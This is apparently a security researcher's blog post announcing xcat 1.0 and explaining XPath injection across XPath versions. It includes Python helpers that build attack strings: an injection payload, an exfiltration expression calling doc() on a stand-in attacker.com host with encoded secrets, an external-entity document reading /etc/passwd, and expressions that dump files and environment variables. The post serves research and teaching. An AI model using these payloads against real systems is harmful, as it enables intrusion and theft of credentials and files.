XCat 1.0 released or: XPath injection issues are severely underrated

I’ve just released xcat 1.0 and its demonstration application after like 5 years of on-off development. Feels good!

The genesis of xcat was when my boss, Sid, walked up to me out of the blue and asked if I wanted to go on an all-expenses-paid trip to Amsterdam. Who the hell wouldn’t say yes to that proposition? “Great! You’ve got a month to write a research paper on XPath injection flaws and we will present it at Black Hat Europe”. Wait… slow down! What’s XPath?!

As it turns out XPath is what you get when you combine the unholy trinity of XML, design-by-committee and large quantities of drugs. But before I get into that here’s a short demo of me listing directories, reading arbitrary files and dumping environment variables through a simple innocuous XPath injection flaw, using xcat:

I recommend reading a little bit about what XPath is and a little bit about blind injection vulnerabilities. I wrote an introduction here or there is the venerable OWASP page on the topic.

XPath 1.0

So, back to large quantities of drugs. The year was 1999. Intel had just released the 800 MHz Pentium III, Internet Explorer 5.0 was the hot new browser and XML was all the rage.

All was not well in the land of XML though: parsing, filtering and generally using it was a huge pain. So some clever people invented a nice, clean and concise syntax for querying XML documents without any hassle:
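
As a minimal sketch of what such a query looks like (the library document and its element names are made up for illustration), here is Python’s built-in ElementTree, which understands a small subset of XPath 1.0, pulling titles out of a document with a single path expression:

```python
import xml.etree.ElementTree as ET

# Hypothetical document, invented purely for this example.
LIBRARY_XML = """
<library>
  <book category="security"><title>Hacking XML</title><year>1999</year></book>
  <book category="cooking"><title>Soup for One</title><year>1998</year></book>
  <book category="security"><title>Injection Flaws</title><year>1999</year></book>
</library>
"""

root = ET.fromstring(LIBRARY_XML)

# One path expression instead of a hand-written loop with nested ifs:
# "every <title> under a <book> whose category attribute is 'security'".
security_titles = [
    title.text for title in root.findall("./book[@category='security']/title")
]
print(security_titles)
```

ElementTree only implements a fraction of XPath 1.0 (no functions, no `or`), so it is a convenient way to show the syntax but not a target for the attacks described later.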


Cool! This seems a lot simpler and more flexible than whatever manual parsing/iteration you’d come up with in $FAVORITE_LANGUAGE. And this was XPath, the people rejoiced and the world was good.

Until 2010.

XPath 2.0

It was decided in 2010 that XPath 1.0 was too simple. What it clearly, clearly lacked was a weird type system (it’s both strongly and weakly typed), a greatly expanded type hierarchy (seriously, go look at that), isinstance checks, casting and a much larger function library.

Now don’t get me wrong: some of these are good changes. But what snuck into this version is the fairly innocuous doc function. Seems simple - you can reference external XML files in your query (almost like a join) and I’m sure there are use cases for this.

This function jumped right out at me when I was struggling through the very, very dense XPath specification, wondering if I should just buy my own bloody holiday to Amsterdam. What does doc('https://attacker.com/xxe.xml') do? Or doc('ftp://internalserver/passwords.xml')? Or, heck, even doc('gopher://server/something')?

Turns out it does what you would expect. It makes the request. So now if you find an exploitable XPath injection flaw you can make arbitrary network requests for any XML-like document you can find. If your internal services respond with HTML that parses as XML that’s great! Or how about if all your Java/.NET configuration files are in XML, storing all those juicy database passwords? That’s even better! We can now read them and download them via any XPath 2.0 injection issue.
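
To make that concrete, here is a rough Python sketch of how an injected value can smuggle a doc() call into a query. The `build_query` function, the `/library/book` path and the `/ping` URL are all hypothetical, standing in for whatever string concatenation the vulnerable application really does:

```python
# Hypothetical server-side code: user input is pasted straight into the query.
def build_query(title: str) -> str:
    return "/library/book[title='" + title + "']"


# Hypothetical attacker input: close the string literal, add a condition that
# calls doc(), then open a new comparison so the trailing quote still balances.
# The other two operands of the `or` chain are false, so the processor has to
# evaluate doc() to decide the result.
payload = "x' or doc('http://attacker.com/ping') or 'a'='b"

print(build_query("Hacking XML"))  # what the developer intended
print(build_query(payload))        # what the attacker gets evaluated
```

Whether the request is actually sent depends on the XPath processor and how it is configured, so treat this as the shape of the attack rather than a guaranteed exploit.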

Beyond that, the interesting thing is that you can use this function to exfiltrate large quantities of data really quickly. The specification very nicely includes an encode-for-uri function, so we could just do:

doc(concat('http://attacker.com/?d=', encode-for-uri(doc('passwords.xml')/some-node)))
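
Here is a small Python sketch of both ends of that channel: building the expression, and recovering the value from the URL the attacker’s web server would see. The helper names are made up, the expression uses concat to glue the URL and the encoded value together, and the “request” is simulated with `urllib.parse.quote` rather than a real XPath processor:

```python
from urllib.parse import parse_qs, quote, urlsplit

ATTACKER_URL = "http://attacker.com/?d="  # placeholder host, as in the post


def exfil_expression(target_xpath: str) -> str:
    """Build an XPath 2.0 expression that leaks target_xpath via doc()."""
    return "doc(concat('" + ATTACKER_URL + "', encode-for-uri(" + target_xpath + ")))"


def recover(request_url: str) -> str:
    """Attacker side: pull the leaked value back out of a logged request URL."""
    return parse_qs(urlsplit(request_url).query)["d"][0]


print(exfil_expression("doc('passwords.xml')/some-node"))

# Simulate the URL the XPath processor would request for a leaked value.
# quote(..., safe="") percent-encodes like encode-for-uri does: everything
# except letters, digits, '-', '_', '.' and '~'.
leaked = "hunter2 & friends"
simulated_request = ATTACKER_URL + quote(leaked, safe="")
print(recover(simulated_request))
```

Because the whole value travels in one request, this is far faster than guessing it a character at a time through a blind true/false oracle.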

Another cool issue is external entity injection. The tl;dr is you can serve up a malicious XML file that is requested by doc() that can read arbitrary files on the filesystem!
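
As a sketch of what that malicious file might look like, here is a Python helper that generates one. The function name, the `data` element and the `leak` entity are invented for illustration. It assumes the target’s XML parser resolves external entities, which many parsers disable by default:

```python
def build_xxe_document(local_path: str) -> str:
    """Return an XML document whose only content is an external entity.

    If the parser behind doc() expands external entities, the <data> element
    ends up containing the contents of local_path on the *target* machine.
    """
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        f'  <!ENTITY leak SYSTEM "file://{local_path}">\n'
        "]>\n"
        "<data>&leak;</data>\n"
    )


# The attacker would host this (for example as xxe.xml) and point doc() at it.
print(build_xxe_document("/etc/passwd"))
```

The injected query would then read something like doc('https://attacker.com/xxe.xml')/data, and the result can be leaked back out with the same doc() trick shown earlier.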

Awesome! xcat implements these attacks by the way.

The real kicker here is:

And this was XPath 2.0. Tom got to go to Amsterdam and present at Black Hat Europe, and the world was good.

Until 2014. At which point the drugs really kicked in.

XPath 3.0/3.1

It was decided in 2014 that XPath 2.0 was too simple. What it clearly, clearly lacked was dynamic function calls, for loops, introspection, array map/filter/reduce, associative arrays, dynamic module loading, JSON parsing, inline functions, exceptions and tracebacks.

So now our lovely, simple XPath has evolved into:

for-each(normalize-unicode(upper-case(json-doc('x.json'))) => tokenize("\s+"),
         function($a) {
            let $a := $a * 10
                        function-lookup($a, 1)(array:map($a, function($b) {
                                let $c := unparsed-text-lines($b)
                                if ($c) {
                                    return xml-to-json($b)
                                } else {
                                    error('This is an error')

Yay! The future is here! Can you smell the progress?

Aside from trying to turn XPath into some JavaScript-esque abomination they also added three interesting functions:

With these we can read any arbitrary text files, and iterate through all environment variables.
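
The XPath 3.0 function library defines `unparsed-text`, `available-environment-variables` and `environment-variable`, which fit that description. Below is a hedged Python sketch that builds expressions using them. The helper names are made up, and the expressions are only constructed as strings here, not run against a real XPath 3.0 processor:

```python
def read_file_expression(path: str) -> str:
    """XPath 3.0 expression returning a whole text file as one string.

    Assumes the path contains no single quotes, which would end the literal.
    """
    return "unparsed-text('" + path + "')"


def dump_env_expression() -> str:
    """XPath 3.0 expression listing every environment variable as NAME=value,
    joined with newlines (codepoints-to-string(10) is a line feed)."""
    return (
        "string-join("
        "for $name in available-environment-variables() "
        "return concat($name, '=', environment-variable($name)), "
        "codepoints-to-string(10))"
    )


print(read_file_expression("/etc/passwd"))
print(dump_env_expression())
```

Either expression can be dropped into encode-for-uri inside a doc() call to ship the result to the attacker in a single request.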

Also if your internal webservice speaks JSON, well then buddy you’re in luck! A simple XPath injection flaw can let the attacker read all of those responses using the handy JSON functions introduced in 3.1.

So by utilizing the same injection flaw and the same out-of-band attack discussed above we can exfiltrate any readable file on the filesystem, or network, quickly and cleanly.


I’m sure they are already working on XPath 4.0. I wonder if they will add access to raw network sockets, or hell, maybe DirectX support. Why not?